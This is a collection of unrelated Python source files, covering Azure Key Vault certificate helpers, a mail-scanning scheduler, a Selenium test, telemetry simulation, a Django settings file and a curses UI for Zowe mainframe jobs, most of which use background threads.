def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
cert_attrs = CertificateAttributes(enabled=not disabled)
logger.info("Starting long-running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client(cli_ctx)
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
check)
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long-running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
os.makedirs(certificate_output_folder, exist_ok=True)
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(cli_ctx, vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
from azure.cli.core._profile import Profile
version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile(cli_ctx=cli_ctx).get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token), api_version=version)
return client
def _create_keyvault(cmd,
cli_ctx,
resource_group_name,
vault_name,
location=None,
sku=None,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.cli.core._profile import Profile
from azure.graphrbac.models import GraphErrorException
profile = Profile(cli_ctx=cli_ctx)
cred, _, tenant_id = profile.get_login_credentials(
resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
subscription = profile.get_subscription()
VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
if not sku:
sku = KeyVaultSkuName.standard.value
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
if subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
if "Datacenter-Core-1709" in os_type:
parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
return parameters
def _set_parameters_for_customize_template(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
logger.info('Primary certificate parameters are not present in parameters file')
raise CLIError('The primary certificate parameter names in the parameters file must be '
'\'sourceVaultValue\', \'certificateThumbprint\' and \'certificateUrlValue\'. '
'If secondary certificate parameters are specified in the parameters file, their names must be '
'\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'.')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cmd,
cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SEC_SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[SEC_CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[SEC_CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameter names in the parameters file must be '
'\'sourceVaultValue\', \'certificateThumbprint\' and \'certificateUrlValue\'. '
'If secondary certificate parameters are specified in the parameters file, their names must be '
'\'secSourceVaultValue\', \'secCertificateThumbprint\' and \'secCertificateUrlValue\'.')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
__main__.py
|
from threading import Thread
import sched, time
from .config import get_config
from .util import error
from .fetcher import fetch_attachements
from .uploader import upload
from .ocr import ocr_attachments
s = sched.scheduler(time.time, time.sleep)
def main():
try:
conf = get_config()
print("Configuration successfully parsed")
except Exception as e:
error("Invalid configuration: " + str(e))
print("Starting mailscan at poll interval of %i seconds..." % conf['pollInterval'])
s.enter(0, 1, executor, (conf,))
s.run(True)
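# executor() re-schedules itself before kicking off the worker thread, so mail fetching,
# OCR and upload run in the background while polling continues at the configured interval.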
def executor(conf):
thread = Thread(target=app, args=(conf,))
s.enter(conf['pollInterval'], 1, executor, (conf,)) # Repeat ...
thread.start()
def app(conf):
attachements = fetch_attachements(conf) # Get attachements
attachements = ocr_attachments(conf, attachements)
upload(conf, attachements) # Upload attachements
if __name__ == '__main__':
main()
|
test_selenium.py
|
import re
import time
import threading
import unittest
from selenium import webdriver
from app import create_app, db
from app.models import Role, User, Post
class SeleniumTestCase(unittest.TestCase):
client = None
@classmethod
def setUpClass(cls):
# launch Chrome
try:
cls.client = webdriver.Chrome()
except:
pass
if cls.client:
cls.app = create_app('testing')
cls.app_context = cls.app.app_context()
cls.app_context.push()
import logging
logger = logging.getLogger('werkzeug')
logger.setLevel('ERROR')
# create database, and fill it up with some faked data
db.create_all()
Role.insert_roles()
User.generate_fake(10)
Post.generate_fake(10)
# add administrator
admin_role = Role.query.filter_by(permissions=0xff).first()
admin = User(email='john@example.com',
username='john', password='cat',
role=admin_role, confirmed=True)
db.session.add(admin)
db.session.commit()
# launch Flask server in a thread
threading.Thread(target=cls.app.run).start()
# give the server a second to ensure it is up
time.sleep(1)
@classmethod
def tearDownClass(cls):
if cls.client:
# close Flask server and browser
cls.client.get('http://localhost:5000/shutdown')
cls.client.close()
# destroy database
db.drop_all()
db.session.remove()
#delete program context
cls.app_context.pop()
def setUp(self):
if not self.client:
self.skipTest('web browser not available')
def tearDown(self):
pass
def test_admin_home_page(self):
# enter homepage
self.client.get('http://localhost:5000/')
self.assertTrue(re.search(r'Hello,\s+Stranger!', self.client.page_source))
# enter login page
self.client.find_element_by_link_text('Log In').click()
self.assertTrue('<h1>Login</h1>' in self.client.page_source)
# login
self.client.find_element_by_name('email').send_keys('john@example.com')
self.client.find_element_by_name('password').send_keys('cat')
self.client.find_element_by_name('submit').click()
self.assertTrue(re.search(r'Hello,\s+john!', self.client.page_source))
# enter userdata page
self.client.find_element_by_link_text('Profile').click()
self.assertTrue('<h1>john</h1>' in self.client.page_source)
|
emvirtual.py
|
#!/usr/bin/python
import json
import logging
import sys
import time
from subsystems.emgps import emGps
from subsystems.emimu import emImu
from subsystems.emsensors import emSensors
from subsystems.emtelemetry import emTelemetry
from random_words import LoremIpsum
from threading import Thread
class emVirtual(object):
def __init__(self):
logging.info('Spacecraft Virtual')
self.mode = "virtual"
self.altitude = None
self.temperature = None
self.sealevelpressure = None
self.pressure = None
self.roll = None
self.pitch = None
self.yaw = None
self.latitude = None
self.longitude = None
self.altitudegps = None
self.satellites = None
self.speed = None
self.track = None
self.li = LoremIpsum()
self.emgpsfd = emGps(self.mode)
self.emimu = emImu(self.mode)
self.emsensors = emSensors(self.mode)
self.emtelemetry = emTelemetry(self.mode)
threadDemoExecute = Thread(target=self.emVirtualExecute)
threadDemoExecute.start()
threadDemoTelemetry = Thread(target=self.emVirtualTelemetry)
threadDemoTelemetry.start()
def emVirtualExecute(self):
self.emgpsfd.start()
try:
while True:
self.latitude, self.longitude, self.altitudegps, self.satellites, self.speed, self.track = self.emgpsfd.emGpsData()
self.roll, self.pitch, self.yaw = self.emimu.emImuData()
self.altitude, self.pressure, self.sealevelpressure, self.temperature = self.emsensors.emSensorsData()
time.sleep(1)
except (StopIteration, KeyboardInterrupt, SystemExit):
pass
def emVirtualTelemetry(self):
try:
while True:
data = {}
data['alive'] = "1"
data['altitude'] = self.altitude
data['pressure'] = self.pressure
data['sealevelpressure'] = self.sealevelpressure
data['temperature'] = self.temperature
data['roll'] = self.roll
data['pitch'] = self.pitch
data['yaw'] = self.yaw
data['latitude'] = self.latitude
data['longitude'] = self.longitude
data['altitudegps'] = self.altitudegps
data['satellites'] = self.satellites
data['speed'] = self.speed
data['track'] = self.track
data['message'] = self.li.get_sentence()
self.emtelemetry.emTelemetryDweetIo(data)
time.sleep(1)
except (StopIteration, KeyboardInterrupt, SystemExit):
pass
def emVirtualRecord(self):
datage = ("{0} " "{1} " "{2} " "{3} " \
"{4} " "{5} " "{6} " "{6} ".format(
self.latitude, self.longitude, self.altitude, self.pressure, \
self.temperature, self.roll, self.pitch, self.yaw))
logging.warning(datage)
# End of File
|
shared_array_test.py
|
import multiprocessing as mp
import numpy as np
import ctypes
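# Worker processes write through both numpy views; because s_array and array are
# views over the shared RawArray buffer (not copies), the parent observes the
# change made by the process that received pid == 5.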
def work(pid):
if pid==5:
s_array[0] = 5
array[0] = 5
# rawarray to nparray via np.asarray
def raw2np(raw):
class Empty: pass
array = Empty()
array.__array_interface__ = {
'data': (raw._wrapper.get_address(), False),
'typestr': 'i',
'descr': None,
'shape': (raw._wrapper.get_size(),),
'strides': None,
'version': 3
}
return np.asarray(array).view(dtype=np.int32)
if __name__ == "__main__":
raw_array= mp.RawArray(ctypes.c_int,
np.asarray([1], dtype=np.int32)
)
# np.frombuffer gives the view without copying the data
# this means that we can use s_array as a shared array,
# and this conversion is the fastest way.
s_array = np.frombuffer(raw_array, dtype=np.int32)
# alternative way
array = raw2np(raw_array)
print s_array.__array_interface__['data'][0]
print raw_array._wrapper.get_address()
print ("%d %d")%(s_array, array[0])
workers = []
for pid in xrange(mp.cpu_count()):
p = mp.Process(target=work, args=(pid,))
workers.append(p)
p.start()
[p.join() for p in workers]
print ("%d %d")%(s_array, array[0])
|
settings_20210906111953.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails)
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:20").do(decrease_day_count_and_send_bday_mails)
# schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise)
def func():
while True:
print("======Runnning==========")
schedule.run_pending()
time.sleep(5)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
dispatch.py
|
import threading
import Queue
import traceback
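# Runs func(*args, **kwargs) on a daemon worker thread and immediately returns a Queue
# that will receive the result; pair with after_completion() so a Tkinter-style window
# polls the queue instead of blocking its event loop.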
def request_results(func, args=(), kwargs={}):
# prepare request
results = Queue.Queue()
func_args = (args, kwargs)
instruct = func, func_args, results
# ask the thread
worker = threading.Thread(target=_compute_results_, args=instruct)
worker.daemon = True
worker.start()
# return the empty results, it is up to the GUI to wait for it
return results
def after_completion(window, queue, func):
def check():
try:
result = queue.get(block=False)
except:
window.after(1000, check)
else:
func(result)
window.after(100, check)
#######################
## Internal use only ##
#######################
def _compute_results_(func, func_args, results):
"internal use only, this function is run entirely in the new worker thread"
args, kwargs = func_args
try: _results = func(*args, **kwargs)
except Exception as errmsg:
_results = Exception(traceback.format_exc() )
results.put( _results )
#print "put",_results
|
main.py
|
import curses
import queue
import string
import subprocess
import threading
import time
from datetime import datetime
state = {}
threads = []
result_pipeline = queue.Queue()
instr_pipeline = queue.Queue()
def execute_zowe_workload():
"""
This function is carried out in a separate thread as the zowe calls take a while to complete and
we want to try and block as little as possible.
:return:
"""
global instr_pipeline
global result_pipeline
try:
t = threading.currentThread()
current_instruction = None
last_run_instruction = 0
item = None
while getattr(t, "do_run", True):
if not instr_pipeline.empty():
item = instr_pipeline.get(False)
if current_instruction is not None or item is not None:
if item != current_instruction or \
last_run_instruction == 0 or \
time.time() - last_run_instruction > 10:
if item is not None:
current_instruction = item
item = None
msg = None
if "delete" in current_instruction:
output = execute_zowe_command(current_instruction)
msg = output
current_instruction = "zowe jobs list jobs"
output = execute_zowe_command(current_instruction)
jobs = parse_job_list(output)
result_pipeline.put({"type": "jobs", "data": jobs, "timestamp": time.time(), "editor.msg": msg})
last_run_instruction = time.time()
time.sleep(0.25)
except Exception as err:
print(err)
def request_job_list():
cmd = "zowe zos-jobs list jobs"
execute_zowe_command(cmd)
def execute_zowe_command(cmd: str):
process = subprocess.run(cmd.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE, text="text")
return process.stdout
def add_shortcut_keys_based_on_job_type(jobs):
global state
keys = state["shortcut_keys"]
menu = ""
for key in jobs.keys():
menu = menu + "[{}]{} ".format(key[0], key[1:])
keys[key[0].lower()] = key
state["shortcut_keys"] = keys
def create_top_menu_shortcuts(jobs):
menu = ""
for key in jobs.keys():
menu = menu + "[{}]{} ".format(key[0], key[1:])
return menu
def update_top_shortcuts_menu(jobs):
add_shortcut_keys_based_on_job_type(jobs)
menu = create_top_menu_shortcuts(jobs)
state["window_tree"]["top_menu"].bkgd(' ', curses.color_pair(2))
state["window_tree"]["top_menu"].addstr(0, 1, menu, curses.color_pair(2))
state["window_tree"]["top_menu"].refresh()
def update_main_window(jobs):
"""
Update the main window listing
:param jobs:
:return:
"""
state["window_tree"]["main"].clear()
heading = "{:3} {:10}{:10}{:15}{:10}".format("Job", "ID", "Type", "Name", "Status")
state["window_tree"]["main"].addstr(2, 1, heading)
horizontal_line = u"\u2015" * int(state["window_tree"]["main"].getmaxyx()[1])
state["window_tree"]["main"].addstr(3, 0, horizontal_line)
cur_y = 4
if state["job_type"] in jobs:
for job in jobs[state["job_type"]]:
try:
state["window_tree"]["main"].addstr(cur_y, 1,
'{:03d} {:10}{:10}{:15}{:10}'.format(job["_num"], job["id"],
job["type"], job["name"],
job["status"]))
except:
pass
cur_y += 1
state["window_tree"]["main"].refresh()
state["zowe_state"] = "READY"
def parse_job_list(stdout_text):
lines = stdout_text.split("\n")
jobs = {}
for l in lines:
if len(l.strip()) > 0:
l = ' '.join(l.split())
columns = l.split(" ")
if len(columns) == 5:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = "{} {}".format(columns[1].strip(), columns[2].strip())
job_name = columns[3].strip()
job_type = columns[4].strip()
elif len(columns) == 4:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = columns[1].strip()
job_name = columns[2].strip()
job_type = columns[3].strip()
elif len(columns) == 3:
job_class = columns[0][0:3].strip().upper()
job_id = columns[0].strip()
job_status = "N/A"
job_name = columns[1].strip()
job_type = columns[2].strip()
else:
raise ValueError("unexpected number of columns in zowe jobs output")
if job_class not in jobs:
jobs[job_class] = []
jobs[job_class].append(
{"_num": len(jobs[job_class]) + 1, "class": job_class, "id": job_id, "status": job_status,
"name": job_name, "type": job_type})
return jobs
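# Curses layout: title and clock on row 0, shortcut menu on row 1, the job list in
# the middle, and an edit bar plus footer/status line at the bottom of the screen.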
def define_windows(stdscr):
# height, width, y, x
# top of screen
title = curses.newwin(1, stdscr.getmaxyx()[1] - 25, 0, 0)
timer_window = curses.newwin(1, 25, 0, stdscr.getmaxyx()[1] - 25)
top_menu = curses.newwin(1, stdscr.getmaxyx()[1], 1, 0)
# bottom of screen
edit_window = curses.newwin(1, stdscr.getmaxyx()[1], stdscr.getmaxyx()[0] - 2, 0)
footer_window = curses.newwin(1, stdscr.getmaxyx()[1] - 40, stdscr.getmaxyx()[0] - 1, 0)
footer_window_right = curses.newwin(1, stdscr.getmaxyx()[1], stdscr.getmaxyx()[0] - 1, stdscr.getmaxyx()[1] - 40)
# middle of screen
main_window = curses.newwin(stdscr.getmaxyx()[0] - 5, stdscr.getmaxyx()[1], 2, 0)
return {"root": stdscr,
"timer": timer_window,
"title": title,
"top_menu": top_menu,
"main": main_window,
"editor": edit_window,
"footer": footer_window,
"updated": footer_window_right
}
def resize_windows(stdscr):
stdscr.clear()
return define_windows(stdscr)
def create_windows(stdscr):
return define_windows(stdscr)
def update_menu_time(window_tree):
window_tree["timer"].bkgd(' ', curses.color_pair(2))
time_text = " {}".format(time.strftime("%Y-%m-%d %H:%M:%S"))
try:
window_tree["timer"].addstr(0, 1, time_text, curses.color_pair(2))
except:
pass
window_tree["timer"].refresh()
def update_edit_bar(window_tree):
pass
def action(state, input):
pass
def update_editor(msg):
state["window_tree"]["editor"].clear()
state["window_tree"]["editor"].bkgd(' ', curses.color_pair(2))
try:
state["window_tree"]["editor"].addstr(msg)
except:
pass
state["window_tree"]["editor"].refresh()
def main(stdscr):
"""
This is our main event loop and we only care about redrawing and getting user input
:param stdscr:
:return:
"""
global state
global instr_pipeline
global result_pipeline
state = {"job_type": "JOB", "zowe_state": "STARTING", "shortcut_keys": {}, "action": None}
keys = {}
curses.halfdelay(5)
user_input = ""
alphabet = string.printable
# height, width, x, y
window_tree = resize_windows(stdscr)
state["window_tree"] = window_tree
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_YELLOW)
instr_pipeline.put("zowe zos-jobs list jobs")
curses.curs_set(0)
while True:
window_tree["root"].refresh()
window_tree["updated"].bkgd(' ', curses.color_pair(2))
window_tree["updated"].refresh()
window_tree["top_menu"].bkgd(' ', curses.color_pair(2))
window_tree["top_menu"].refresh()
window_tree["editor"].bkgd(' ', curses.color_pair(2))
window_tree["editor"].refresh()
window_tree["updated"].bkgd(' ', curses.color_pair(2))
window_tree["updated"].refresh()
window_tree["footer"].bkgd(' ', curses.color_pair(2))
window_tree["footer"].refresh()
if not result_pipeline.empty():
msg = result_pipeline.get(False)
if msg is not None:
if msg["type"] == "jobs":
state["jobs"] = msg["data"]
update_top_shortcuts_menu(msg["data"])
update_main_window(state["jobs"])
if msg["editor.msg"] is not None:
update_editor(msg["editor.msg"])
elif msg["type"] == "editor":
update_editor(msg["data"])
if msg is not None:
window_tree["updated"].bkgd(' ', curses.color_pair(2))
try:
window_tree["updated"].addstr(0, 1, "{} {:>}".format("Last Updated: ", datetime.fromtimestamp(
msg["timestamp"]).strftime("%Y-%m-%d %H:%M:%S")), curses.color_pair(2))
except:
pass
window_tree["updated"].refresh()
update_menu_time(window_tree)
window_tree["title"].bkgd(' ', curses.color_pair(2))
menu = "{} ".format("Zowe Terminal Explorer")
try:
window_tree["title"].addstr(0, 1, menu, curses.color_pair(2))
except:
pass
window_tree["title"].refresh()
window_tree["main"].bkgd(' ', curses.color_pair(1))
window_tree["main"].refresh()
window_tree["footer"].bkgd(' ', curses.color_pair(2))
try:
window_tree["footer"].addstr(0, 1, "[Q]uit [D]elete", curses.color_pair(2))
except:
pass
window_tree["footer"].refresh()
key = stdscr.getch()
if key == curses.KEY_RESIZE:
window_tree["root"].clear()
window_tree = resize_windows(stdscr)
else:
changed = False
if key != ord('q') and key in range(0x110000):
ch = chr(key)
if ch in state["shortcut_keys"]:
state["job_type"] = state["shortcut_keys"][ch]
update_top_shortcuts_menu(msg["data"])
update_main_window(state["jobs"])
changed = True
if not changed:
if key == 27: # ESCAPE
state["action"] = None
user_input = None
update_editor("")
elif key == ord('q'):
update_editor("Waiting for threads to shutdown...")
threads[0].do_run = False
threads[0].join()
return
elif key in range(0x110000) and chr(key) in "0123456789" and state["action"] is not None:
user_input += chr(key)
update_editor(" Enter job number from first column: {}".format(user_input))
elif key == ord('d') and state["action"] is None:
state["action"] = "d"
update_editor(" Enter job number from first column: ")
elif key == curses.KEY_BACKSPACE and state["action"] is not None:
if len(user_input) > 0:
user_input = user_input[:-1]
elif key == curses.KEY_ENTER or key == 10:
try:
job_num = int(user_input)
if state["action"] == "d":
valid_jobs = state["jobs"][state["job_type"]]
found = False
for j in valid_jobs:
if j["_num"] == job_num:
update_editor("Deleting {} with job id '{}'".format(j["_num"], j["id"]))
instr_pipeline.put("zowe jobs delete job {}".format(j["id"]))
found = True
break
if not found:
update_editor(" {} is not a valid number.".format(job_num))
state["action"] = None
user_input = None
else:
update_editor(" Not a valid action.")
state["action"] = None
user_input = None
except ValueError as err:
update_editor(" Not a valid job number.")
state["action"] = None
user_input = None
def direct():
"""
Used for testing without curses
:return:
"""
global instr_pipeline
instr_pipeline.put("zowe zos-jobs list jobs")
time.sleep(10)
print(result_pipeline.get())
if __name__ == "__main__":
"""
Main entry point
"""
t = threading.Thread(target=execute_zowe_workload)
t.do_run = True
t.start()
